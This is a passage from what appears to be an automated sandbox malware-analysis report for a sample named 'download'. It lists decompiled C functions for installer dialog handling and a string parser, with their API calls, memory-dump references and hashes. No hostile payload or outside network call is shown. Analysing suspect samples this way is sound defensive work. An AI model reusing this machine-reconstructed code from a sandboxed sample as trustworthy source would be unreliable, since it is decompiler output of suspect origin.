                                                      					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                      				}
                                                      				goto L36;
                                                      			}






































                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405241
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405250
                                                      • GetClientRect.USER32(?,?), ref: 0040528D
                                                      • GetSystemMetrics.USER32(00000002), ref: 00405294
                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052B5
                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052C6
                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052D9
                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052E7
                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052FA
                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040531C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405330
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405351
                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405361
                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040537A
                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405386
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040525F
                                                        • Part of subcall function 00404051: SendMessageA.USER32(00000028,?,00000001,00403E81), ref: 0040405F
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053A2
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005176,00000000), ref: 004053B0
                                                      • CloseHandle.KERNELBASE(00000000), ref: 004053B7
                                                      • ShowWindow.USER32(00000000), ref: 004053DA
                                                      • ShowWindow.USER32(?,00000008), ref: 004053E1
                                                      • ShowWindow.USER32(00000008), ref: 00405427
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040545B
                                                      • CreatePopupMenu.USER32 ref: 0040546C
                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405481
                                                      • GetWindowRect.USER32(?,000000FF), ref: 004054A1
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054BA
                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054F6
                                                      • OpenClipboard.USER32(00000000), ref: 00405506
                                                      • EmptyClipboard.USER32 ref: 0040550C
                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405515
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040551F
                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405533
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040554C
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405557
                                                      • CloseClipboard.USER32 ref: 0040555D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID:
                                                      • API String ID: 590372296-0
                                                      • Opcode ID: dadd1f5a3a53f6153d4068de795145be5a4dbd7634b151cd1cb0500ee1942e15
                                                      • Instruction ID: cba8cb344929e6fa6818a5c25344ad4bfa6cf128d012b59fb2cbbdf576d19343
                                                      • Opcode Fuzzy Hash: dadd1f5a3a53f6153d4068de795145be5a4dbd7634b151cd1cb0500ee1942e15
                                                      • Instruction Fuzzy Hash: C2A16B70900608BFDF119F64DE89EAE7B79FF48354F00402AFA45B61A1C7794E529F68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E00403B48(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                      				struct HWND__* _v32;
                                                      				void* _v84;
                                                      				void* _v88;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t35;
                                                      				signed int _t37;
                                                      				signed int _t39;
                                                      				intOrPtr _t44;
                                                      				struct HWND__* _t49;
                                                      				signed int _t68;
                                                      				struct HWND__* _t74;
                                                      				signed int _t87;
                                                      				struct HWND__* _t92;
                                                      				signed int _t100;
                                                      				int _t104;
                                                      				signed int _t116;
                                                      				signed int _t117;
                                                      				int _t118;
                                                      				signed int _t123;
                                                      				struct HWND__* _t126;
                                                      				struct HWND__* _t127;
                                                      				int _t128;
                                                      				long _t131;
                                                      				int _t133;
                                                      				int _t134;
                                                      				void* _t135;
                                                      				void* _t142;
                                                      				void* _t143;
                                                      
                                                      				_t116 = _a8;
                                                      				if(_t116 == 0x110 || _t116 == 0x408) {
                                                      					_t35 = _a12;
                                                      					_t126 = _a4;
                                                      					__eflags = _t116 - 0x110;
                                                      					 *0x79f528 = _t35;
                                                      					if(_t116 == 0x110) {
                                                      						 *0x7a2f48 = _t126;
                                                      						 *0x79f53c = GetDlgItem(_t126, 1);
                                                      						_t92 = GetDlgItem(_t126, 2);
                                                      						_push(0xffffffff);
                                                      						_push("true");
                                                      						 *0x79e508 = _t92;
                                                      						E0040401C(_t126);
                                                      						SetClassLongA(_t126, 0xfffffff2,  *0x7a2728);
                                                      						 *0x7a270c = E0040140B(4);
                                                      						_t35 = 1;
                                                      						__eflags = 1;
                                                      						 *0x79f528 = 1;
                                                      					}
                                                      					_t123 =  *0x40a1dc; // 0x0
                                                      					_t134 = 0;
                                                      					_t131 = (_t123 << 6) +  *0x7a2f80;
                                                      					__eflags = _t123;
                                                      					if(_t123 < 0) {
                                                      						L34:
                                                      						E00404068(0x40b);
                                                      						while(1) {
                                                      							_t37 =  *0x79f528;
                                                      							 *0x40a1dc =  *0x40a1dc + _t37;
                                                      							_t131 = _t131 + (_t37 << 6);
                                                      							_t39 =  *0x40a1dc; // 0x0
                                                      							__eflags = _t39 -  *0x7a2f84; // 0x2
                                                      							if(__eflags == 0) {
                                                      								E0040140B(1);
                                                      							}
                                                      							__eflags =  *0x7a270c - _t134; // 0x0
                                                      							if(__eflags != 0) {
                                                      								break;
                                                      							}
                                                      							_t44 =  *0x7a2f84; // 0x2
                                                      							__eflags =  *0x40a1dc - _t44; // 0x0
                                                      							if(__eflags >= 0) {
                                                      								break;
                                                      							}
                                                      							_t117 =  *(_t131 + 0x14);
                                                      							E00405F9F(_t117, _t126, _t131, 0x7ab800,  *((intOrPtr*)(_t131 + 0x24)));
                                                      							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                      							_push(0xfffffc19);
                                                      							E0040401C(_t126);
                                                      							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                      							_push(0xfffffc1b);
                                                      							E0040401C(_t126);
                                                      							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                      							_push(0xfffffc1a);
                                                      							E0040401C(_t126);
                                                      							_t49 = GetDlgItem(_t126, 3);
                                                      							__eflags =  *0x7a2fec - _t134; // 0x0
                                                      							_v32 = _t49;
                                                      							if(__eflags != 0) {
                                                      								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                      								__eflags = _t117;
                                                      							}
                                                      							ShowWindow(_t49, _t117 & 0x00000008); // executed
                                                      							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
                                                      							E0040403E(_t117 & 0x00000002);
                                                      							_t118 = _t117 & 0x00000004;
                                                      							EnableWindow( *0x79e508, _t118);
                                                      							__eflags = _t118 - _t134;
                                                      							if(_t118 == _t134) {
                                                      								_push(1);
                                                      							} else {
                                                      								_push(_t134);
                                                      							}
                                                      							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                      							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                      							__eflags =  *0x7a2fec - _t134; // 0x0
                                                      							if(__eflags == 0) {
                                                      								_push( *0x79f53c);
                                                      							} else {
                                                      								SendMessageA(_t126, 0x401, 2, _t134);
                                                      								_push( *0x79e508);
                                                      							}
                                                      							E00404051();
                                                      							E00405F7D(0x79f540, E00403B29());
                                                      							E00405F9F(0x79f540, _t126, _t131,  &(0x79f540[lstrlenA(0x79f540)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                      							SetWindowTextA(_t126, 0x79f540); // executed
                                                      							_push(_t134);
                                                      							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                      							__eflags = _t68;
                                                      							if(_t68 != 0) {
                                                      								continue;
                                                      							} else {
                                                      								__eflags =  *_t131 - _t134;
                                                      								if( *_t131 == _t134) {
                                                      									continue;
                                                      								}
                                                      								__eflags =  *(_t131 + 4) - 5;
                                                      								if( *(_t131 + 4) != 5) {
                                                      									DestroyWindow( *0x7a2718); // executed
                                                      									 *0x79ed18 = _t131;
                                                      									__eflags =  *_t131 - _t134;
                                                      									if( *_t131 <= _t134) {
                                                      										goto L58;
                                                      									}
                                                      									_t74 = CreateDialogParamA( *0x7a2f40,  *_t131 +  *0x7a2720 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
                                                      									__eflags = _t74 - _t134;
                                                      									 *0x7a2718 = _t74;
                                                      									if(_t74 == _t134) {
                                                      										goto L58;
                                                      									}
                                                      									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                      									_push(6);
                                                      									E0040401C(_t74);
                                                      									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                      									ScreenToClient(_t126, _t135 + 0x10);
                                                      									SetWindowPos( *0x7a2718, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                      									_push(_t134);
                                                      									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                      									__eflags =  *0x7a270c - _t134; // 0x0
                                                      									if(__eflags != 0) {
                                                      										goto L61;
                                                      									}
                                                      									ShowWindow( *0x7a2718, 8); // executed
                                                      									E00404068(0x405);
                                                      									goto L58;
                                                      								}
                                                      								__eflags =  *0x7a2fec - _t134; // 0x0
                                                      								if(__eflags != 0) {
                                                      									goto L61;
                                                      								}
                                                      								__eflags =  *0x7a2fe0 - _t134; // 0x1
                                                      								if(__eflags != 0) {
                                                      									continue;
                                                      								}
                                                      								goto L61;
                                                      							}
                                                      						}
                                                      						DestroyWindow( *0x7a2718);
                                                      						 *0x7a2f48 = _t134;
                                                      						EndDialog(_t126,  *0x79e910);
                                                      						goto L58;
                                                      					} else {
                                                      						__eflags = _t35 - 1;
                                                      						if(_t35 != 1) {
                                                      							L33:
                                                      							__eflags =  *_t131 - _t134;
                                                      							if( *_t131 == _t134) {
                                                      								goto L61;
                                                      							}
                                                      							goto L34;
                                                      						}
                                                      						_push(0);
                                                      						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                      						__eflags = _t87;
                                                      						if(_t87 == 0) {
                                                      							goto L33;
                                                      						}
                                                      						SendMessageA( *0x7a2718, 0x40f, 0, 1);
                                                      						__eflags =  *0x7a270c - _t134; // 0x0
                                                      						return 0 | __eflags == 0x00000000;
                                                      					}
                                                      				} else {
                                                      					_t126 = _a4;
                                                      					_t134 = 0;
                                                      					if(_t116 == 0x47) {
                                                      						SetWindowPos( *0x79f520, _t126, 0, 0, 0, 0, 0x13);
                                                      					}
                                                      					if(_t116 == 5) {
                                                      						asm("sbb eax, eax");
                                                      						ShowWindow( *0x79f520,  ~(_a12 - 1) & _t116);
                                                      					}
                                                      					if(_t116 != 0x40d) {
                                                      						__eflags = _t116 - 0x11;
                                                      						if(_t116 != 0x11) {
                                                      							__eflags = _t116 - 0x111;
                                                      							if(_t116 != 0x111) {
                                                      								L26:
                                                      								return E00404083(_t116, _a12, _a16);
                                                      							}
                                                      							_t133 = _a12 & 0x0000ffff;
                                                      							_t127 = GetDlgItem(_t126, _t133);
                                                      							__eflags = _t127 - _t134;
                                                      							if(_t127 == _t134) {
                                                      								L13:
                                                      								__eflags = _t133 - 1;
                                                      								if(_t133 != 1) {
                                                      									__eflags = _t133 - 3;
                                                      									if(_t133 != 3) {
                                                      										_t128 = 2;
                                                      										__eflags = _t133 - _t128;
                                                      										if(_t133 != _t128) {
                                                      											L25:
                                                      											SendMessageA( *0x7a2718, 0x111, _a12, _a16);
                                                      											goto L26;
                                                      										}
                                                      										__eflags =  *0x7a2fec - _t134; // 0x0
                                                      										if(__eflags == 0) {
                                                      											_t100 = E0040140B(3);
                                                      											__eflags = _t100;
                                                      											if(_t100 != 0) {
                                                      												goto L26;
                                                      											}
                                                      											 *0x79e910 = 1;
                                                      											L21:
                                                      											_push(0x78);
                                                      											L22:
                                                      											E00403FF5();
                                                      											goto L26;
                                                      										}
                                                      										E0040140B(_t128);
                                                      										 *0x79e910 = _t128;
                                                      										goto L21;
                                                      									}
                                                      									__eflags =  *0x40a1dc - _t134; // 0x0
                                                      									if(__eflags <= 0) {
                                                      										goto L25;
                                                      									}
                                                      									_push(0xffffffff);
                                                      									goto L22;
                                                      								}
                                                      								_push(_t133);
                                                      								goto L22;
                                                      							}
                                                      							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                      							_t104 = IsWindowEnabled(_t127);
                                                      							__eflags = _t104;
                                                      							if(_t104 == 0) {
                                                      								goto L61;
                                                      							}
                                                      							goto L13;
                                                      						}
                                                      						SetWindowLongA(_t126, _t134, _t134);
                                                      						return 1;
                                                      					} else {
                                                      						DestroyWindow( *0x7a2718);
                                                      						 *0x7a2718 = _a12;
                                                      						L58:
                                                      						_t142 =  *0x7a0540 - _t134; // 0x1
                                                      						if(_t142 == 0) {
                                                      							_t143 =  *0x7a2718 - _t134; // 0x10408
                                                      							if(_t143 != 0) {
                                                      								ShowWindow(_t126, 0xa); // executed
                                                      								 *0x7a0540 = 1;
                                                      							}
                                                      						}
                                                      						L61:
                                                      						return 0;
                                                      					}
                                                      				}
                                                      			}

































                                                      0x00403c4f
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00000000
                                                      0x00403c51
                                                      0x00403c44
                                                      0x00403c49
                                                      0x00000000
                                                      0x00403c49
                                                      0x00403c28
                                                      0x00403c2e
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c30
                                                      0x00000000
                                                      0x00403c30
                                                      0x00403c20
                                                      0x00000000
                                                      0x00403c20
                                                      0x00403c06
                                                      0x00403c0d
                                                      0x00403c13
                                                      0x00403c15
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c15
                                                      0x00403bd1
                                                      0x00000000
                                                      0x00403baf
                                                      0x00403bb5
                                                      0x00403bbf
                                                      0x00403fc6
                                                      0x00403fc6
                                                      0x00403fcc
                                                      0x00403fce
                                                      0x00403fd4
                                                      0x00403fd9
                                                      0x00403fdf
                                                      0x00403fdf
                                                      0x00403fd4
                                                      0x00403fe9
                                                      0x00000000
                                                      0x00403fe9
                                                      0x00403bad

                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B84
                                                      • ShowWindow.USER32(?), ref: 00403BA1
                                                      • DestroyWindow.USER32 ref: 00403BB5
                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BD1
                                                      • GetDlgItem.USER32(?,?), ref: 00403BF2
                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C06
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C0D
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403CBB
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403CC5
                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403CDF
                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D30
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403DD6
                                                      • ShowWindow.USER32(00000000,?), ref: 00403DF7
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E09
                                                      • EnableWindow.USER32(?,?), ref: 00403E24
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E3A
                                                      • EnableMenuItem.USER32(00000000), ref: 00403E41
                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E59
                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E6C
                                                      • lstrlenA.KERNEL32(0079F540,?,0079F540,00000000), ref: 00403E96
                                                      • SetWindowTextA.USER32(?,0079F540), ref: 00403EA5
                                                      • ShowWindow.USER32(?,0000000A), ref: 00403FD9
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID:
                                                      • API String ID: 3282139019-0
                                                      • Opcode ID: 15b6375a1e693d3e2cd3c5fe237b60442a4c361cd33fb8cff5c4eaa7748e9161
                                                      • Instruction ID: be3397b8ddd8732ae82b8f0fff634cab03aa6bc43632f84706db7e79d14484ee
                                                      • Opcode Fuzzy Hash: 15b6375a1e693d3e2cd3c5fe237b60442a4c361cd33fb8cff5c4eaa7748e9161
                                                      • Instruction Fuzzy Hash: CEC1C271504600AFEB216F65ED85E2B3ABCEB85706F00453EF641B11F2CB3D9A429B6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E706B1A98() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				CHAR* _v24;
                                                      				CHAR* _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				CHAR* _v44;
                                                      				signed int _v48;
                                                      				void* _v52;
                                                      				intOrPtr _v56;
                                                      				CHAR* _t199;
                                                      				signed int _t202;
                                                      				void* _t204;
                                                      				void* _t206;
                                                      				CHAR* _t208;
                                                      				void* _t216;
                                                      				struct HINSTANCE__* _t217;
                                                      				struct HINSTANCE__* _t218;
                                                      				struct HINSTANCE__* _t220;
                                                      				signed short _t222;
                                                      				struct HINSTANCE__* _t225;
                                                      				struct HINSTANCE__* _t227;
                                                      				void* _t228;
                                                      				char* _t229;
                                                      				void* _t240;
                                                      				signed char _t241;
                                                      				signed int _t242;
                                                      				void* _t246;
                                                      				struct HINSTANCE__* _t248;
                                                      				void* _t249;
                                                      				signed int _t251;
                                                      				signed int _t253;
                                                      				signed int _t259;
                                                      				signed int _t262;
                                                      				signed int _t264;
                                                      				void* _t267;
                                                      				void* _t271;
                                                      				struct HINSTANCE__* _t273;
                                                      				signed char _t276;
                                                      				void _t277;
                                                      				signed int _t278;
                                                      				signed int _t290;
                                                      				signed int _t291;
                                                      				void* _t293;
                                                      				signed int _t297;
                                                      				signed int _t300;
                                                      				signed int _t303;
                                                      				signed int _t304;
                                                      				signed int _t305;
                                                      				signed char _t308;
                                                      				signed int _t309;
                                                      				CHAR* _t310;
                                                      				CHAR* _t312;
                                                      				CHAR* _t313;
                                                      				struct HINSTANCE__* _t314;
                                                      				void* _t316;
                                                      				signed int _t317;
                                                      				void* _t318;
                                                      
                                                      				_t273 = 0;
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				_v16 = 0;
                                                      				_v8 = 0;
                                                      				_v40 = 0;
                                                      				_t318 = 0;
                                                      				_v48 = 0;
                                                      				_t199 = E706B1215();
                                                      				_v24 = _t199;
                                                      				_v28 = _t199;
                                                      				_v44 = E706B1215();
                                                      				_t309 = E706B123B();
                                                      				_v52 = _t309;
                                                      				_v12 = _t309;
                                                      				while(1) {
                                                      					_t202 = _v32;
                                                      					_v56 = _t202;
                                                      					if(_t202 != _t273 && _t318 == _t273) {
                                                      						break;
                                                      					}
                                                      					_t308 =  *_t309;
                                                      					_t276 = _t308;
                                                      					_t204 = _t276 - _t273;
                                                      					if(_t204 == 0) {
                                                      						_t33 =  &_v32;
                                                      						 *_t33 = _v32 | 0xffffffff;
                                                      						__eflags =  *_t33;
                                                      						L17:
                                                      						_t206 = _v56 - _t273;
                                                      						if(_t206 == 0) {
                                                      							 *_v28 =  *_v28 & 0x00000000;
                                                      							__eflags = _t318 - _t273;
                                                      							if(_t318 == _t273) {
                                                      								_t246 = GlobalAlloc(0x40, 0x14a4); // executed
                                                      								_t318 = _t246;
                                                      								 *(_t318 + 0x810) = _t273;
                                                      								 *(_t318 + 0x814) = _t273;
                                                      							}
                                                      							_t277 = _v36;
                                                      							_t43 = _t318 + 8; // 0x8
                                                      							_t208 = _t43;
                                                      							_t44 = _t318 + 0x408; // 0x408
                                                      							_t310 = _t44;
                                                      							 *_t318 = _t277;
                                                      							 *_t208 =  *_t208 & 0x00000000;
                                                      							 *(_t318 + 0x808) = _t273;
                                                      							 *_t310 =  *_t310 & 0x00000000;
                                                      							_t278 = _t277 - _t273;
                                                      							__eflags = _t278;
                                                      							 *(_t318 + 0x80c) = _t273;
                                                      							 *(_t318 + 4) = _t273;
                                                      							if(_t278 == 0) {
                                                      								__eflags = _v28 - _v24;
                                                      								if(_v28 == _v24) {
                                                      									goto L39;
                                                      								}
                                                      								_t316 = 0;
                                                      								GlobalFree(_t318);
                                                      								_t318 = E706B12FE(_v24);
                                                      								__eflags = _t318 - _t273;
                                                      								if(_t318 == _t273) {
                                                      									goto L39;
                                                      								} else {
                                                      									goto L32;
                                                      								}
                                                      								while(1) {
                                                      									L32:
                                                      									_t240 =  *(_t318 + 0x14a0);
                                                      									__eflags = _t240 - _t273;
                                                      									if(_t240 == _t273) {
                                                      										break;
                                                      									}
                                                      									_t316 = _t318;
                                                      									_t318 = _t240;
                                                      									__eflags = _t318 - _t273;
                                                      									if(_t318 != _t273) {
                                                      										continue;
                                                      									}
                                                      									break;
                                                      								}
                                                      								__eflags = _t316 - _t273;
                                                      								if(_t316 != _t273) {
                                                      									 *(_t316 + 0x14a0) = _t273;
                                                      								}
                                                      								_t241 =  *(_t318 + 0x810);
                                                      								__eflags = _t241 & 0x00000008;
                                                      								if((_t241 & 0x00000008) == 0) {
                                                      									_t242 = _t241 | 0x00000002;
                                                      									__eflags = _t242;
                                                      									 *(_t318 + 0x810) = _t242;
                                                      								} else {
                                                      									_t318 = E706B1534(_t318);
                                                      									 *(_t318 + 0x810) =  *(_t318 + 0x810) & 0xfffffff5;
                                                      								}
                                                      								goto L39;
                                                      							} else {
                                                      								_t290 = _t278 - 1;
                                                      								__eflags = _t290;
                                                      								if(_t290 == 0) {
                                                      									L28:
                                                      									lstrcpyA(_t208, _v44);
                                                      									L29:
                                                      									lstrcpyA(_t310, _v24);
                                                      									L39:
                                                      									_v12 = _v12 + 1;
                                                      									_v28 = _v24;
                                                      									L56:
                                                      									if(_v32 != 0xffffffff) {
                                                      										_t309 = _v12;
                                                      										continue;
                                                      									}
                                                      									break;
                                                      								}
                                                      								_t291 = _t290 - 1;
                                                      								__eflags = _t291;
                                                      								if(_t291 == 0) {
                                                      									goto L29;
                                                      								}
                                                      								__eflags = _t291 != 1;
                                                      								if(_t291 != 1) {
                                                      									goto L39;
                                                      								}
                                                      								goto L28;
                                                      							}
                                                      						}
                                                      						if(_t206 != 1) {
                                                      							goto L39;
                                                      						}
                                                      						_t248 = _v16;
                                                      						if(_v40 == _t273) {
                                                      							_t248 = _t248 - 1;
                                                      						}
                                                      						 *(_t318 + 0x814) = _t248;
                                                      						goto L39;
                                                      					}
                                                      					_t249 = _t204 - 0x23;
                                                      					if(_t249 == 0) {
                                                      						__eflags = _t309 - _v52;
                                                      						if(_t309 <= _v52) {
                                                      							L15:
                                                      							_v32 = _t273;
                                                      							_v36 = _t273;
                                                      							goto L17;
                                                      						}
                                                      						__eflags =  *((char*)(_t309 - 1)) - 0x3a;
                                                      						if( *((char*)(_t309 - 1)) != 0x3a) {
                                                      							goto L15;
                                                      						}
                                                      						__eflags = _v32 - _t273;
                                                      						if(_v32 == _t273) {
                                                      							L40:
                                                      							_t251 = _v32 - _t273;
                                                      							__eflags = _t251;
                                                      							if(_t251 == 0) {
                                                      								__eflags = _t308 - 0x2a;
                                                      								if(_t308 == 0x2a) {
                                                      									_v36 = 2;
                                                      									L54:
                                                      									_t309 = _v12;
                                                      									_v28 = _v24;
                                                      									_t273 = 0;
                                                      									__eflags = 0;
                                                      									L55:
                                                      									_t317 = _t309 + 1;
                                                      									__eflags = _t317;
                                                      									_v12 = _t317;
                                                      									goto L56;
                                                      								}
                                                      								__eflags = _t308 - 0x2d;
                                                      								if(_t308 == 0x2d) {
                                                      									L145:
                                                      									_t253 = _t309 + 1;
                                                      									__eflags =  *_t253 - 0x3e;
                                                      									if( *_t253 != 0x3e) {
                                                      										L147:
                                                      										_t253 = _t309 + 1;
                                                      										__eflags =  *_t253 - 0x3a;
                                                      										if( *_t253 != 0x3a) {
                                                      											L154:
                                                      											_v28 =  &(_v28[1]);
                                                      											 *_v28 = _t308;
                                                      											goto L55;
                                                      										}
                                                      										__eflags = _t308 - 0x2d;
                                                      										if(_t308 == 0x2d) {
                                                      											goto L154;
                                                      										}
                                                      										_v36 = 1;
                                                      										L150:
                                                      										_v12 = _t253;
                                                      										__eflags = _v28 - _v24;
                                                      										if(_v28 <= _v24) {
                                                      											 *_v44 =  *_v44 & 0x00000000;
                                                      										} else {
                                                      											 *_v28 =  *_v28 & 0x00000000;
                                                      											lstrcpyA(_v44, _v24);
                                                      										}
                                                      										goto L54;
                                                      									}
                                                      									_v36 = 3;
                                                      									goto L150;
                                                      								}
                                                      								__eflags = _t308 - 0x3a;
                                                      								if(_t308 != 0x3a) {
                                                      									goto L154;
                                                      								}
                                                      								__eflags = _t308 - 0x2d;
                                                      								if(_t308 != 0x2d) {
                                                      									goto L147;
                                                      								}
                                                      								goto L145;
                                                      							}
                                                      							_t259 = _t251 - 1;
                                                      							__eflags = _t259;
                                                      							if(_t259 == 0) {
                                                      								L77:
                                                      								_t293 = _t276 + 0xffffffde;
                                                      								__eflags = _t293 - 0x55;
                                                      								if(_t293 > 0x55) {
                                                      									goto L54;
                                                      								}
                                                      								switch( *((intOrPtr*)(( *(_t293 + 0x706b2219) & 0x000000ff) * 4 +  &M706B218D))) {
                                                      									case 0:
                                                      										__eax = _v24;
                                                      										__edi = _v12;
                                                      										while(1) {
                                                      											__edi = __edi + 1;
                                                      											_v12 = __edi;
                                                      											__cl =  *__edi;
                                                      											__eflags = __cl - __dl;
                                                      											if(__cl != __dl) {
                                                      												goto L129;
                                                      											}
                                                      											L128:
                                                      											__eflags =  *(__edi + 1) - __dl;
                                                      											if( *(__edi + 1) != __dl) {
                                                      												L133:
                                                      												 *__eax =  *__eax & 0x00000000;
                                                      												__eax = E706B1224(_v24);
                                                      												__ebx = __eax;
                                                      												goto L94;
                                                      											}
                                                      											L129:
                                                      											__eflags = __cl;
                                                      											if(__cl == 0) {
                                                      												goto L133;
                                                      											}
                                                      											__eflags = __cl - __dl;
                                                      											if(__cl == __dl) {
                                                      												__edi = __edi + 1;
                                                      												__eflags = __edi;
                                                      											}
                                                      											__cl =  *__edi;
                                                      											 *__eax =  *__edi;
                                                      											__eax = __eax + 1;
                                                      											__edi = __edi + 1;
                                                      											_v12 = __edi;
                                                      											__cl =  *__edi;
                                                      											__eflags = __cl - __dl;
                                                      											if(__cl != __dl) {
                                                      												goto L129;
                                                      											}
                                                      											goto L128;
                                                      										}
                                                      									case 1:
                                                      										_v8 = 1;
                                                      										goto L54;
                                                      									case 2:
                                                      										_v8 = _v8 | 0xffffffff;
                                                      										goto L54;
                                                      									case 3:
                                                      										_v8 = _v8 & 0x00000000;
                                                      										_v20 = _v20 & 0x00000000;
                                                      										_v16 = _v16 + 1;
                                                      										goto L82;
                                                      									case 4:
                                                      										__eflags = _v20;
                                                      										if(_v20 != 0) {
                                                      											goto L54;
                                                      										}
                                                      										_v12 = _v12 - 1;
                                                      										__ebx = E706B1215();
                                                      										 &_v12 = E706B1A36( &_v12);
                                                      										__eax = E706B1429(__edx, __eax, __edx, __ebx);
                                                      										goto L94;
                                                      									case 5:
                                                      										L102:
                                                      										_v20 = _v20 + 1;
                                                      										goto L54;
                                                      									case 6:
                                                      										_push(7);
                                                      										goto L120;
                                                      									case 7:
                                                      										_push(0x19);
                                                      										goto L140;
                                                      									case 8:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L104;
                                                      									case 9:
                                                      										_push(0x15);
                                                      										goto L140;
                                                      									case 0xa:
                                                      										_push(0x16);
                                                      										goto L140;
                                                      									case 0xb:
                                                      										_push(0x18);
                                                      										goto L140;
                                                      									case 0xc:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L115;
                                                      									case 0xd:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L106;
                                                      									case 0xe:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L108;
                                                      									case 0xf:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L119;
                                                      									case 0x10:
                                                      										__eax = 0;
                                                      										__eax = 1;
                                                      										__eflags = 1;
                                                      										goto L110;
                                                      									case 0x11:
                                                      										_push(3);
                                                      										goto L120;
                                                      									case 0x12:
                                                      										_push(0x17);
                                                      										L140:
                                                      										_pop(__ebx);
                                                      										goto L95;
                                                      									case 0x13:
                                                      										__eax =  &_v12;
                                                      										__eax = E706B1A36( &_v12);
                                                      										__ebx = __eax;
                                                      										__ebx = __eax + 1;
                                                      										__eflags = __ebx - 0xb;
                                                      										if(__ebx < 0xb) {
                                                      											__ebx = __ebx + 0xa;
